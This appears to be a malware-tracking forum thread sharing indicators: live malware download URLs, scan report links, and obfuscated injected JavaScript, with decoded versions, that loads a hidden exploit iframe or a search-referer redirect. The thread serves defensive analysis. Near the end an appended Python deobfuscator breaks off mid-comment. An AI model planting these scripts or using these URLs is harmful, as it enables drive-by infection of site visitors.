Trojan Pinch:
siski-piski.biz/tarif/pin.exe
http://www.virustotal.com/analisis/ebf13bc733aff1068de51d379f3760da
Trojan:
fp3s.biz/6007.exe
http://www.virustotal.com/analisis/56081b98a809bdde7394834e262053cf
Trojan:
antivirus.vc/pictures/forum/ftp1.exe
http://www.virustotal.com/analisis/cc07134acd95c61cda816efb94778537
-
http://cutheatergroup.cn/fl/index.php
http://wepawet.iseclab.org/view.php?hash=3c532cd0cfca29264a4000f6e9476f16&t=1241447080&type=js
http://cutheatergroup.cn/fl/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=8078638d68a0675fe56b6e14ebf5425a&t=1241447310&type=js
http://cutheatergroup.cn/fl/load.php?id=4
http://cutheatergroup.cn/fl/load.php?id=5
http://www.virustotal.com/analisis/a61bd8c9f1542069d75889f4f9040adc 8/39
-
Redirects to fake codec page
hxxp://rhianna.name/vidd/
Wepawet (http://wepawet.iseclab.org/view.php?hash=9bc249ed3be0d9f451ab3a96d0dd4ba4&t=1241454697&type=js)
Fake codec page
hxxp://tubecollection2009.com/xxplay.php?id=40009
Trojan:
hxxp://kvm-softwares.com/softwarefortubeview.40009.exe
VirusTotal (http://www.virustotal.com/analisis/b6082ec0b0c912976887d0549ed5a315) - 10/40 (25%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1f91f09153120c524a56fa4930c32dbe3)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=b179b7959a87bd316d7f7f11a993e037)
downloads:
hxxp://imageempires.com/perce/064c5b7bbc854008e18e97e54448fea26776e621b10f2f35f025196defd65efd23a07ce83fb8ef114/80f/perce.jpg
hxxp://picturesoffline.com/item/86ccfb2b2c651048211e775514986e728746d681618fff45b0b539ddffb6de8d73c0aca83fc8ef51e/50a/item.gif
hxxp://pictureswall.com/werber/109/216.jpg
VirusTotal (http://www.virustotal.com/analisis/5455beb9e4d430a802947aff82a28c45) - 28/40 (70%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=129c01269a6adfa745da5c44dbefb2560)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=e49048a38d0757b92a34dff6fc3b3f74)
VirusTotal (http://www.virustotal.com/analisis/7ff08733247ab68a16cba8621f5b403b) - 22/40 (55%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=11ad97792e7b27b543d32662c7752f36a)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=532bd3862d3500f65d3abada38c673c5)
VirusTotal (216.jpg - bb.jpg) (http://www.virustotal.com/analisis/6fd1a269e6d5fa4a25f3b057b57c3591) - 14/40 (35%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1e91fdd1c62e3db5469d63159691a8364)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=3b51dcb1768fd868c6a4c5a03299f807)
perce.jpg
HTTP Conversations:
216.240.157.91:80 - [imagesrepository.com]
POST /resolution.php
88.214.205.8:80 - [zone-searching.com]
POST /borders.php
item.gif
HTTP Conversations:
216.240.157.88:80 - [last-visit.com]
GET /cset.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
GET /uget.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
-
Trojan:
hxxp://kvm-softwares.com/softwarefortubeview.40009.exe
VirusTotal (http://www.virustotal.com/analisis/b6082ec0b0c912976887d0549ed5a315) - 10/40 (25%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1f91f09153120c524a56fa4930c32dbe3)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=b179b7959a87bd316d7f7f11a993e037)
see also:
xxx-softwares.com
cool-softtech.com
rtfm-softweares.com
xyu-softportal.com
xepace-software.com
ce-softwares.com
dig-softportals.com
pac-softportal.com
-
This IP hosts similar websites with the same payload: http://www.robtex.com/ip/195.88.80.41.html (http://www.robtex.com/ip/195.88.80.41.html)
can be downloaded using "/softwarefortubeview.40007.exe" - "/softwarefortubeview.40008.exe" etc.
hxxp://xxx-softwares.com/softwarefortubeview.40009.exe
hxxp://cool-softtech.com/softwarefortubeview.40009.exe
hxxp://rtfm-softweares.com/softwarefortubeview.40009.exe
hxxp://xyu-softportal.com/softwarefortubeview.40009.exe
hxxp://xepace-software.com/softwarefortubeview.40009.exe
hxxp://ce-softwares.com/softwarefortubeview.40009.exe
hxxp://dig-softportals.com/softwarefortubeview.40009.exe
hxxp://pac-softportal.com/softwarefortubeview.40009.exe
File size: 65536 bytes
MD5...: b179b7959a87bd316d7f7f11a993e037
VirusTotal (http://www.virustotal.com/analisis/8f2b9ad6c0782cc4f50921d16061056a)
-
They also have the same structure with "promo.exe"
hxxp://xxx-softwares.com/promo.exe
hxxp://cool-softtech.com/promo.exe
hxxp://rtfm-softweares.com/promo.exe
hxxp://xyu-softportal.com/promo.exe
hxxp://xepace-software.com/promo.exe
hxxp://ce-softwares.com/promo.exe
hxxp://dig-softportals.com/promo.exe
hxxp://pac-softportal.com/promo.exe
File size: 74752 bytes
MD5: 951f3ee90eb3576325fa1920e3da678c
VirusTotal (http://www.virustotal.com/analisis/4551c0b455166626a3034c22888a856d) - 29/39 (74.36%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=101a845c61bdcac74392ebc2f97208986&call=first)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=5863553963378030c5223e76bca37da1)
HTTP Conversations:
216.240.148.9:80 - dfdsfdsfcdsc.com
Request: GET /bbb.php
Request: GET /ccc_2.php?uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&aid=&os=513
-
related: teyrebuf[.]cn, gukgifoc[.]cn, beelposttraning[.]ru, dastrealworld[.]ru
redirects to exploits:
hxxp://dastrealworld.ru/denunreal.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=10fc58eeacba6fa759b1305d1d30610d&t=1241486137&type=js)
the script that came with this one
<script>
document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));
</script>
<script>
eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));
</script>
the iframe:
<style type="text/css"> iframe {width:0;height:0;border:0;} </style>
var b24 = String.fromCharCode(104,116,116,112,58,47,47,100,97,115,116,114,101,97,108,119,111,114,108,100,46,114,117,47,100,101,110,117,110,114,101,97,108,46,104,116,109,108);document.write(unescape('<iframe src=\''+b24+'\'></iframe>'));
Found here:
http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js (http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js)
others on the same site
hxxp://dastrealworld.ru/underworld.html
hxxp://dastrealworld.ru/cover.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=13648af19411e61a80007ca84c1b2ab5&t=1241486057&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=3caa65b128918f67b6d2d28b2d8e36b4&t=1241486229&type=js)
pdf exploits:
hxxp://gukgifoc.cn/nuc/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=60f130f89de4dc9c4bc40334423ce7d8&t=1241079304&type=js)
-
hxxp://totalweightlosscenter.com/images/go.php?sid=1
hxxp://nikolaevere.com/images/data/load.php
- - - - - - - - - - -
Pharmacy crap:
http://www.robtex.com/ip/203.117.111.123.html
- - - - - - - - - - -
Hadn't seen this lame trick in quite some time...
hxxp://www.mediapartner.by.ru/bunners/banunicom.gif
http://www.virustotal.com/analisis/228b180b2318b8477201eea15d09a0bb
Result: 7/40 (17.5%)
- - - - - - - - - - -
hxxp://update.dom11z.cn/cache/readme.pdf
http://www.virustotal.com/analisis/54bcdbcb1f52dc418c5af7fd965eb75e
Interesting IP... lots of domains there seem to redirect to update.dom11z.cn above, one way or another:
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.230#result
-
From the 213.182.197.2xx neighbourhood again...
hxxp://hostyapics.com/video/988/install_flash_player.exe
http://www.virustotal.com/analisis/72fa934c6d4d76a80a2d714d3586cc8b
Result: 4/40 (10%)
http://anubis.iseclab.org/?action=result&task_id=170666b5c144e68b4b9008d22642304c4&format=html
---->
hxxp://members.chello.pl/i.lemecha/index1.gif
http://www.virustotal.com/analisis/a9bb65e395a3f6a43ef8bec2790d9697
Result: 4/39 (10.26%)
http://anubis.iseclab.org/?action=result&task_id=1451aadd8279355c469500473ed1e00b3&format=html
--->
(Anubis results in short... I've commented only the ones that have a somewhat lousy detection rate):
hxxp://adimsceibh.com/progs/eqkxyll/cziwjnoo.php?adv=adv557
hxxp://adimsceibh.com/progs/eqkxyll/vblymjwx.php
hxxp://adimsceibh.com/progs/eqkxyll/bueesf.php
hxxp://adimsceibh.com/progs/eqkxyll/rtqrrfss.php
hxxp://adimsceibh.com/progs/eqkxyll/fczzm.php
hxxp://adimsceibh.com/progs/eqkxyll/hrnbopcqde.php
hxxp://adimsceibh.com/progs/eqkxyll/yvscpd.php // Result: 4/40 (10%) - Pinch
hxxp://adimsceibh.com/progs/eqkxyll/gqrrfft // Result: 9/41 (21.96%) - Vundo
-
PDF exploits (all the same, on IP 91.212.41.119):
nicdaheb.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=d0151c3192d10713487fff545fab19ff&t=1241590847&type=js
sehmadac.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=e0ee4d85cd32c9d38378686a65413636&t=1241591188&type=js
vavgurac.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=de5856cb0d29edcbf0151722249c73f8&t=1241591259&type=js
tixleloc.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=614e78b7f2bf16d7fc76ebfd876e57d5&t=1241591442&type=js
teyrebuf.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=371a870529fc3101c03eeee07e93124c&t=1241591523&type=js
tukhemaj.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=251584c0c643dcfe6ba8ec2842547b76&t=1241591544&type=js
tixwagoq.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=aee55ad675950b610765dc60a7772a9d&t=1241591577&type=js
all lead to this trojan:
nicdaheb.cn/nuc/exe.php
http://www.virustotal.com/analisis/3b2a31a93f84f0b540f14abbe54a89e0
Rogue:
antivguardian.com
antiawarepro.com
antivirprof.com
Fake AV:
stats.swpstats.com/getfile?id=26
http://www.virustotal.com/analisis/ed4436020c7fe8208e13d0b19cda10db
Fake AV:
free-webscaners.com/scan
Koobface:
64.4.224.45/setup.exe
69.154.143.170/setup.exe
75.54.183.125/setup.exe
62.98.53.173/setup.exe
74.216.59.250/setup.exe
http://www.virustotal.com/analisis/6914e7738d5af094ac7105a4aa087a60
Trojan:
http://down.yyduowan.net/2.exe
http://www.virustotal.com/analisis/b008ea75feb56250e0124be694180c2d
Trojan:
svarkon.ru/update.exe
http://www.virustotal.com/analisis/f8f886d3907495a15f08d982bbae11b2
-
http://72.29.67.139/knb/megatrader-2k_20090505.exe
http://vilko.biz/opi/index.php
http://vilko.biz/opi/load.php
http://vilko.biz/opi/cache/readme.pdf
http://vilko.biz/myy/index.php
http://vilko.biz/myy/load.php
http://vilko.biz/myy/cache/readme.pdf
-
Exploit: (downloaded file on MDL)
liteautobestguide.cn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=66fec491755fc72f675563dd6c4fc20a&t=1241645815&type=js
Also a trojan on that domain:
liteautobestguide.cn/load.php
http://www.virustotal.com/analisis/bfbac430fbb0fb3096239b7c98d384ac
Koobface:
65.75.82.150/setup.exe
98.203.149.224/setup.exe
trojan:
qqcfwaigua.com/cfwg.exe
http://www.virustotal.com/analisis/7403d735e83451ef65863b15b832d9ae
-
Koobface:
70.105.181.119/setup.exe
98.228.135.203/setup.exe
129.119.193.233/setup.exe
http://www.virustotal.com/analisis/89e1b7e8bf4f2be5773a1000a8dd3817
-
Koobface:
86.121.7.57/setup.exe
69.247.67.92/setup.exe
Trojan:
greatjobdealuk.info/isp/upload/socksbot.exe
http://www.virustotal.com/analisis/ef89795fe5c6a42f855e37216328e0cb
-
216.240.143.7
Fake codec page:
hxxp://better-tube-show.com/xxplay.php?id=40009
Registrant: Bobby Macleod (bobbym806@ gmail.com)
216.240.148.9
Returns malware urls:
hxxp://hjtktyjyhhn.com/fff9999.php?aid=0&uid=00cd1a40d41d8cd98f00b204e9800998ecf8427e&os=512
Registrant: Jameson Jack (cyber38462@ hotmail.com)
hxxp://imageempires.com/perce/8020ac6db14a14e0ed94c17da86c8d0938cff0c02ba29014aee9a81000a9b998de6c0f98a422879eb/400/perce.jpg
hxxp://picturesoffline.com/item/60b08c6de14a64b07d04519db83c3dc948ef80e0bbf2e054ae09d830c0194928cecc8fb814f2678e0/b01/item.gif
hxxp://pictureswall.com/werber/b0f/216.jpg
hxxp://sdfv-programs.com/file.exe
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=f621255677a794be1390e48b47823fa0)
70.86.3.198 [c6.3.5646.static.theplanet.com]
Trojan Clicker:
hxxp://jump1.info/xxx.exe
hxxp://xxx.host800.com/xxx.exe
VirusTotal (http://www.virustotal.com/analisis/4abfb028c31a9979aaa09b9de52b7d5f) - 24/40 (60.00%)
Registrant: yong wang (edizhu@ hotmail.com)
Registrant: youguang wang (edisoho@ hotmail.com)
Trojan GameThief OnLineGames:
61.174.68.24
hxxp://www.361safae.cn/img/sri1.gif
hxxp://www.361safae.cn/img/sri2.gif
hxxp://www.361safae.cn/img/sri3.gif
hxxp://www.361safae.cn/img/sri4.gif
hxxp://www.361safae.cn/img/sri5.gif
hxxp://www.361safae.cn/img/sri6.gif
hxxp://www.361safae.cn/img/sri7.gif
hxxp://www.361safae.cn/img/sri8.gif
hxxp://www.361safae.cn/img/sri9.gif
Registrant: Xie Yang (ylaoda88@ 163.com)
VirusTotal (http://www.virustotal.com/analisis/e47da00f08d79ea42c45d7f01ed88291)
VirusTotal (http://www.virustotal.com/analisis/bb63e441554489f062be7dbdb5ee5fc0)
VirusTotal (http://www.virustotal.com/analisis/542d74d0849cea1a0aa0d673d9fddbf3)
VirusTotal (http://www.virustotal.com/analisis/f3d8ce321d53b6004d629c5e976790c0)
VirusTotal (http://www.virustotal.com/analisis/9b8a676e815e3feb25b0fe89c1220c72)
VirusTotal (http://www.virustotal.com/analisis/ad7c98b2bcc7454278e9b89cdce1962c)
VirusTotal (http://www.virustotal.com/analisis/164799816ed1a0455861268b3176bcc8)
VirusTotal (http://www.virustotal.com/analisis/e57ffc5b955bce7a44a1f410d2b0e9bf)
60.173.10.53
hxxp://ipshougou.com/down/qqma.exe
Registrant: phyto, phyto (support@ tongyong.net)
VirusTotal (http://www.virustotal.com/analisis/2f0359e1a9c783731865f01544a69c62)
-
Drivebys
Mebroot
http://ijpabevvif.com/ld/gnh_2/gnh2.exe
http://ijpabevvif.com/ld/gnh_3/gnh3.exe
http://ijpabevvif.com/ld/gnh_4/gnh4.exe
http://ijpabevvif.com/ld/gnh_5/gnh5.exe
http://ijpabevvif.com/ld/gnh_7/gnh7.exe
http://ijpabevvif.com/ld/gnh_8/gnh8.exe
http://ijpabevvif.com/ld/gnh_9/gnh9.exe
http://ijpabevvif.com/ld/grg/grg.exe
Misc
-
Mebroot
hamm, they changed their way of infection again?
-
hXXp://hugetopnano.cn:8080/index.php
downloads
flash.swf
http://www.virustotal.com/analisis/6a7c462458c96cc099cfb7e340e15562
readme.pdf
http://www.virustotal.com/analisis/cfc979bd7744a91c5f444c8f4c0375e2
-
KoobFace:
71.202.219.18/setup.exe
208.97.2.97/setup.exe
Trojan:
yourelitehosting.ru/taskmgr.exe
http://www.virustotal.com/analisis/4b38b6888024000227a834d65b612365
Trojan:
5file.ru/vkphoto.exe
http://www.virustotal.com/analisis/b4c968b1eb1f4fa95fa9eca46b09adeb
Trojan:
bureau.co.il/web/system.exe
http://www.virustotal.com/analisis/31e365b7f7c555b50d752a9eb118ce1a
Fake AV:
adware-help.com/promo/anti-virus-1.php?uid=70e191e0aaeac213213a62e4c05c9977
the downloaded file:
installz.cn/stubfiles/70e19.exe
http://www.virustotal.com/analisis/b18edcbad2b207e305d789afb32cd4e6
-
hamm, they changed their way of infection again?
It's strange, yes; not sure what to make of it. I see the iframes launch but nothing happens, then I can fetch the binary locally using a direct link.
Maybe they know who I am by now. :'(
-
redirects to rogue:
gorankscan.com
Fake AV:
scanlux4.info
pornproductions09.com/scan/?id=268
and the d/l file:
pornproductions09.net/codec.exe
http://www.virustotal.com/analisis/51f9f528c0444f84faa229177660ed09
Mebroot:
hiyuxngvif.com/cgi-bin/index.cgi?dx
http://wepawet.cs.ucsb.edu/view.php?hash=8cadb9cae57538f219069c6cb2d44555&t=1242183318&type=js
-
While checking some old LuckySploit URL, the following popped up instead:
hxxp://addobeflashplayer.net/update/?promoid=FbU9dTs
hxxp://addobeflashplayer.net/update/?promoid=Ve8Tnv4
With installer at:
hxxp://addobeflashplayer.net/get/flashplayer/current/install_flash_player.exe
http://www.virustotal.com/analisis/3185d068ff2871765328dcdc86d7affc
-
Koobface:
75.137.70.87/setup.exe
174.0.8.174/setup.exe
http://www.virustotal.com/analisis/06202d4e1ceb674f95435d05bcc6149f
Exploit/trojan:
luks5.cn/index.php
http://wepawet.iseclab.org/view.php?hash=c7a0e50c37e35c290324455c17b4b27e&t=1241763932&type=js
Exploit/trojan (Wepawet gives invalid hostname)
usacaaugb.cn/life/index.php
PDF analysis: http://wepawet.iseclab.org/view.php?hash=711a0cc4d481aa078c161179779310f1&type=js
-
exploits
rogkadej.cn/nuc/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=76a617d6921697f36d5d08f5fe163908&t=1242296838&type=js
trojan
rogkadej.cn/nuc/exe.php
http://www.virustotal.com/analisis/be735f15770e8e06ebac50ec1bfafd40 7/40
-
redirect to exploits
bigbestfind.cn:8080/ts/in.cgi?pepsi4
hugepremium.cn:8080/ts/in.cgi?pepsi5
thebestyoucanfind.cn:8080/ts/in.cgi?pepsi3
http://wepawet.cs.ucsb.edu/view.php?hash=e95003549c9b2d9c5cc9388f2056d9bc&t=1242302241&type=js
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53ddc7d15d0b2c2083c09c15aff3593a&t=1242284850
http://wepawet.iseclab.org/view.php?hash=8e897a5695627f956885238acabfff04&t=1242296961&type=js
exploit
bigtopcabaret.cn:8080/index.php
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53ddc7d15d0b2c2083c09c15aff3593a&t=1242284850
redirects to the already known autobestwestern.cn
formerly hosted at Zlkon and Eurohost LLC
autobestwestern.cn:8080/load.php?id=8
http://www.virustotal.com/analisis/77e676047adcaeeb5b32187f346de431 9/41
-
http://internetsecuritymetrics.com/hitin.php?land=30&affid=01986
http://videoporntrue.net/pcdef.exe
-
www.loshaqe.com/sb.exe
http://www.virustotal.com/analisis/75e4162cf4b32e95418e9c9cb087f647 5/40
http://www.threatexpert.com/report.aspx?md5=3f451779cfd0dc44f54b8b10b658749f
www.loshaqe.com/ret.exe
http://www.virustotal.com/analisis/bea1ceb55fc01d3abc1c206f7aae4a31 14/39
downloader for DarkGT/IframeDollar
www.loshaqe.com/ins.exe
http://www.virustotal.com/analisis/26120869a3d862b46bf64e769f0fc32b 25/40
www.loshaqe.com/eg.exe
http://www.virustotal.com/analisis/a05691e95c2b074300ca8e075a69853b 11/40
-
Koobface:
71.8.59.249/setup.exe
Trojan:
vexpen.jino.ru/file/bot.exe
http://www.virustotal.com/analisis/60c864a624b006b5c3a1e9875ae99c4a
Fake AV:
antvirushelpv1.com
(download link ain't working atm but will work soon I guess...)
securityhelpcenter.com/1/
(currently only have a link to the fake payment site at:
live-payment-system.com/buy.php?nh=1&id=
-
http://antvirushelpv1.com/download.php?id=2004
;)
Downloads: Install_2004.exe (132K)
Actually just came across it whilst researching a malicious URL in the Google results that redirected me to it;
qualitycollisionbodyshop.com/gkxtd/zunet/cadets.htm
You've got to load it with a Google referer string though, or it'll redir you to nothingsville courtesy of;
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://qualitycollisionbodyshop.com/gkxtd/zunet/2.js
Server IP: 76.162.102.189 [ rev.opentransfer.com.189.102.162.76.in-addr.arpa ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 04:22:43:22
*****************************************************************
eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,47,111,112,101,110,115,116,97,114,49,46,110,101,116,47,105,110,46,99,103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,102,40,41));
Which decodes to;
function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location = ("http://openstar1.net/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
}
window.onFocus = f()
/edit
http://www.virustotal.com/analisis/d3008ef63c7db98bc3da9b63a3e567d2
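The three wrappers seen in this thread (unescape("%XX...") in the dastrealworld.ru scripts, String.fromCharCode(...) and the eval() around both, as in the referer-check blob above) can be peeled statically, without running any of the script. This is an added example for triage, not code from the thread or any tool it mentions; the sample inputs are the two unescape payloads quoted earlier and a hand-wrapped copy of this post's "window.onFocus = f()" line, and all function and constant names are my own.

```python
"""Static peeler for the JavaScript wrappers quoted in this thread:
unescape("%XX..."), String.fromCharCode(n,n,...) and a surrounding eval().
Nothing is executed; each layer is rewritten with regular expressions only,
so the analyst reads the URLs without ever running the page's script."""
import re

# Constructed samples. STYLE_HEX and IFRAME_HEX are the two unescape() payloads
# from the dastrealworld.ru post; SAMPLE_ONFOCUS is this post's final line
# "window.onFocus = f()" wrapped by hand in eval(String.fromCharCode(...)).
STYLE_HEX = ("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61"
             "%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72"
             "%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e")
IFRAME_HEX = ("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28"
              "%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c"
              "%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c"
              "%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c"
              "%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c"
              "%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b"
              "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61"
              "%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b")
SAMPLE_STYLE = 'document.write(unescape("' + STYLE_HEX + '"));'
SAMPLE_IFRAME = 'eval(unescape("' + IFRAME_HEX + '"));'
SAMPLE_ONFOCUS = ('eval(String.fromCharCode(119,105,110,100,111,119,46,111,110,70,111,99,117,115,'
                  '32,61,32,102,40,41));')

PCT_RE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')
# Only plain literals without embedded quotes are rewritten; a concatenation such as
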